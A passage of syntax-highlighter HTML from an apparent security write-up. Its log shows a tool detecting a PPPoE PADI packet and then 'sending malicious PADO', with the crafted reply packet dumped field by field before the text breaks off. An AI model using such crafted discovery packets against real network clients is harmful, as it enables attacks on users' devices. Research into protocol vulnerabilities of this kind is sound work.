data-line=\"crayon-58f7e28ed7cd0252992039-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-64\">64<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-2\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">packet<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checking <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-e\">PADI<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-3\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-e\">PADI <\/span><span class=\"crayon-v\">detected<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-4\"><span class=\"crayon-p\">###[ PPP over Ethernet Discovery ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">version<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1L<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1L<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PADI<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-8\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sessionid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-10\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-12\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;lol&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-14\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Uniq<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-16\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;!\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-18\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">End<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">List<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-20\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-22\"><span class=\"crayon-p\">###[ Padding ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">load<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-24\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-25\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-26\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;!\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-27\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-28\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Padding<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-29\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sending <\/span><span class=\"crayon-e\">malicious <\/span><span class=\"crayon-v\">PADO<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-30\"><span class=\"crayon-p\">###[ Ethernet ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-31\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">5a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a5<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9b<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-32\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1f<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">17<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-33\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8863<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-34\"><span class=\"crayon-p\">###[ PPP over Ethernet Discovery ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">version<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PADO<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-38\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">sessionid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-40\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-42\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-43\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;lol&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-44\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Uniq<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-46\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-47\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;!\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-48\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Cookie<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-50\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-51\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-52\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd0252992039-54\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd0252992039-55\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 